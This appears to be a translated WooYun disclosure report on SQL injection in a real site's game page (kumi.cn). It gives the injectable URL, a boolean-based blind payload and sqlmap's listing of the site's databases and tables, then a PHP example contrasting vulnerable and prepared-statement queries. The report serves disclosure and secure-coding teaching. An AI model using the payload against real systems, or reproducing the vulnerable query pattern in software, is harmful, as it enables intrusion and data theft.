Vulnerability summary
Defect ID: wooyun-2013-045281
Title: SQL injection on Kumi (kumi.cn) could yield server privileges
Vendor: kumi.cn
Author: Ebon_Wolf
Submitted: 2013-12-09 11:54
Fix date: 2013-12-14 11:54
Published: 2013-12-14 11:54
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 20
Status: vendor was notified but ignored the vulnerability
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2013-12-09: details sent to the vendor, awaiting vendor handling
2013-12-14: vendor actively ignored the vulnerability; details disclosed to the public
Brief description:
An unfiltered parameter on a Kumi game page leads to SQL injection.
Detailed description:
Test URL:
www.kumi.cn/360/xiaoyouxi/game.php?content=17613
Let me say up front: this was security testing only, I did not take a shell!
Test results:
Place: GET
Parameter: content
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=17613 AND 3739=3739
available databases [15]:
[*] information_schema
[*] kumi_app
[*] kumi_cms2
[*] kumi_dingzhi
[*] kumi_eduflash
[*] kumi_eduflash1
[*] kumi_ipad_donghua
[*] kumi_news
[*] kumi_search
[*] kumi_tudou
[*] kumi_upload
[*] miyadalu
[*] mysql
[*] test
[*] xiaoyouxi
Preliminary enumeration of table information:
Database: kumi_cms2
[124 tables]
+---------------------------------------+
| cms_admin |
| cms_admin_role |
| cms_admin_role_priv |
| cms_ads |
| cms_ads_place |
| cms_ads_stat |
| cms_announce |
| cms_area |
| cms_ask |
| cms_ask_actor |
| cms_ask_credit |
| cms_ask_posts |
| cms_ask_vote |
| cms_attachment |
| cms_author |
| cms_block |
| cms_c_cooperate |
| cms_c_down |
| cms_c_flash |
| cms_c_flv |
| cms_c_group |
| cms_c_info |
| cms_c_ku6video |
| cms_c_news |
| cms_c_photo |
| cms_c_picture |
| cms_c_product |
| cms_c_program |
| cms_c_star |
| cms_c_upload |
| cms_c_video |
| cms_c_vod |
| cms_c_voting |
| cms_c_wallpaper |
| cms_c_wallpaper_photo |
| cms_c_yunshi |
| cms_cache_count |
| cms_category |
| cms_collect |
| cms_comment |
| cms_content |
| cms_content_count |
| cms_content_position |
| cms_content_tag |
| cms_copyfrom |
| cms_datasource |
| cms_digg |
| cms_digg_log |
| cms_donghua_pic |
| cms_donghua_pic_bak |
| cms_editor_data |
| cms_hits |
| cms_ipbanned |
| cms_keylink |
| cms_keyword |
| cms_log |
| cms_member |
| cms_member_cache |
| cms_member_detail |
| cms_member_group |
| cms_member_group_extend |
| cms_member_group_priv |
| cms_member_info |
| cms_menu |
| cms_model |
| cms_model_field |
| cms_module |
| cms_mood |
| cms_mood_data |
| cms_order |
| cms_order_deliver |
| cms_order_log |
| cms_pay_card |
| cms_pay_exchange |
| cms_pay_payment |
| cms_pay_pointcard_type |
| cms_pay_stat |
| cms_pay_user_account |
| cms_player |
| cms_position |
| cms_process |
| cms_process_status |
| cms_recommend |
| cms_recommend_info |
| cms_recommend_pic |
| cms_recommend_type |
| cms_role |
| cms_search |
| cms_search_type |
| cms_session |
| cms_sohu |
| cms_sohu_list |
| cms_special |
| cms_special_content |
| cms_status |
| cms_times |
| cms_type |
| cms_urlrule |
| cms_workflow |
| cms_zw_vote |
| cms_zw_voteip |
| disney_diaocha |
| kumi_bless |
| kumi_dell |
| kumi_ef |
| kumi_jiajia |
| kumi_mood |
| kumi_mood_ranking |
| kumi_ndj |
| kumi_player |
| kumi_player_bak |
| kumi_program_bbs_mapping |
| kumi_program_flash_mapping |
| kumi_program_flv_mapping |
| kumi_program_group_mapping |
| kumi_program_photo_mapping |
| kumi_program_star_mapping |
| kumi_program_type_mapping |
| kumi_risi |
| kumi_uploadvideo |
| last_video |
| nicaihua_ip |
| update_contents |
| yunshi |
+---------------------------------------+
There is too much information here, so I did not go any deeper.
Proof of vulnerability: (same as the test results in the detailed description above)
Fix recommendation:
From the information above you should already know how to handle this.
Filter the game.php parameter; it is SQL injection, any programmer knows the drill.
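As an added example (not code from this report or from kumi.cn), the pattern the report describes, a GET parameter spliced straight into the query, is shown next to a hardened version that validates the parameter as an integer and binds it with a prepared statement; the "games" table and the in-memory SQLite database are assumptions so the example runs offline, and the payloads are the ones sqlmap reported above.

```php
<?php
// Added example, not code from the report or from kumi.cn: the vulnerable
// pattern the report describes beside a hardened version. The "games" table
// and the in-memory SQLite database are assumptions so the example runs
// offline; the payload is the one sqlmap reported on the page.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE games (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO games VALUES (17613, 'constructed sample game')");

// Vulnerable: the raw GET parameter is spliced into the SQL text, so
// "17613 AND 3739=3739" rewrites the WHERE clause instead of being a value.
function loadGameVulnerable(PDO $db, string $content): ?array
{
    $row = $db->query("SELECT id, title FROM games WHERE id = $content")
              ->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened: accept only a positive integer, then bind it as a typed
// parameter so the database engine never parses it as SQL.
function loadGameHardened(PDO $db, string $content): ?array
{
    $id = filter_var($content, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;            // caller should answer HTTP 400
    }
    $stmt = $db->prepare('SELECT id, title FROM games WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$legit  = '17613';
$truthy = '17613 AND 3739=3739';   // payload from the report; condition is true
$falsy  = '17613 AND 3739=3740';   // same shape; condition is false

// The vulnerable query answers the two payloads differently; that difference
// is exactly the oracle a boolean-based blind scan measures.
var_dump(loadGameVulnerable($db, $truthy) !== null);
var_dump(loadGameVulnerable($db, $falsy) !== null);

// The hardened version serves the plain id and rejects both payloads.
var_dump(loadGameHardened($db, $legit) !== null);
var_dump(loadGameHardened($db, $truthy) !== null);
var_dump(loadGameHardened($db, $falsy) !== null);
```

Requires PHP with the pdo_sqlite extension; in the real application the same validate-then-bind shape applies to the MySQL connection, with the id cast to int before it reaches the query.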
New Year is coming; a bit more reward money would be nice.
Copyright notice: when reposting, credit the source: Ebon_Wolf@WooYun
Vulnerability response
Vendor response:
Severity: no impact, vendor ignored
Ignored at: 2013-12-14 11:54
Vendor reply:
Latest status:
2013-12-16: Fixed. Thanks.